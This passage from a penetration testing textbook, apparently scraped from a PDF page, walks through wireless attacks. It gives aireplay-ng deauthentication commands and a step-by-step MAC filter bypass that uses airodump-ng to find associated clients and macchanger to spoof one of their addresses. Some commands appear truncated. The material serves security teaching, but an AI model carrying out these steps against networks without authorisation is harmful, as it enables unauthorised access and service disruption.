Ethical Hacking and Penetration Testing Guide
◾ Ethical Hacking and Penetration Testing Guide Speeding Up the Process
Yüklə 22,44 Mb. Pdf görüntüsü
|
- Bu səhifədəki naviqasiya:
- Bypassing MAC Filters on Wireless Networks
|
296
◾ Ethical Hacking and Penetration Testing Guide Speeding Up the Process In case we don’t want to wait for the client to disconnect and then reconnect, we can perform a deauthentication attack as explained earlier to force all the clients associated with that access point (which we want to target) to disconnect and then reconnect to the access point. Command : aireplay-ng -0 3 –a The –0 stands for the deauthentication attack followed by the number 3, which would send exactly three deauthentication packets. The –a parameter is used to specify the MAC address of the target access point , which in this case would be 64:70:02:8A:12:94, followed by our interface mon0. Bypassing MAC Filters on Wireless Networks Apart from hiding the SSID, it’s also a common practice for network administrators to apply MAC filtering on the access point so that only white-listed hosts with MAC addresses would be able to connect to the access point. This is done in colleges and universities where they only want registered students to have access to the Internet. MAC filtering is also a part of low-level security along with hiding the SSID; however, just like the hidden SSID, this security measure terribly fails in the real world, since an attacker can spoof a legitimate MAC address to connect to the access point. Here is how this attack would be carried out: 1. The attacker would scan the access point for the hosts that are already connected to the access point. 2. Next, the attacker would note down the MAC address of the legitimate client that is con- nected to the access point and spoof the MAC address to get into the white list and would be able to connect and use the access point. So here is how we would combine airodump-ng and macchanger to bypass MAC filtering restrictions: Note : Make sure that you already have monitor mode enabled before performing the following steps. Step 1 —The first command we would use is “airodump-ng” to scan for all the neighbor net- works. To demonstrate this attack, we would assume that the access point with ESSID “ROMEO” having a BSSID of “F4:3E:61:9c:77:3B” has enabled MAC filtering and only a set of allowed MAC addresses are able to connect to this access point. Wireless Hacking ◾ 297 Step 2 —The next step would be to find a client that is already associated with the access point. We will use airodump to find it for us. Command : airodump-ng –c 1 –a –bssid F4:3E:61:9C:77:3B mon0 Since the access point is on channel 1, we would type –c 1; the “–a” parameter would display clients that are currently associated with the access point. The output shows us that two stations are currently up with MAC addresses B0:D0:9C:5C:EF:86 and 48:DC:FB:B1:F3:7D. Step 3 —The final step would be to spoof our MAC address and change it to one of the client’s. We can use a neat program in BackTrack called macchanger, but for that, we would need to disable the monitor mode first. Command : airmon-ng stop wlan0 Next, we would use the following command to spoof our current MAC address. macchanger –m B0:D0:9C:5C:EF:86 wlan0 The MAC address of the client, B0:D0:9C:5C:EF:86, is already associated with the access point. Finally, we would issue the following command to bring the wlan0 interface up. |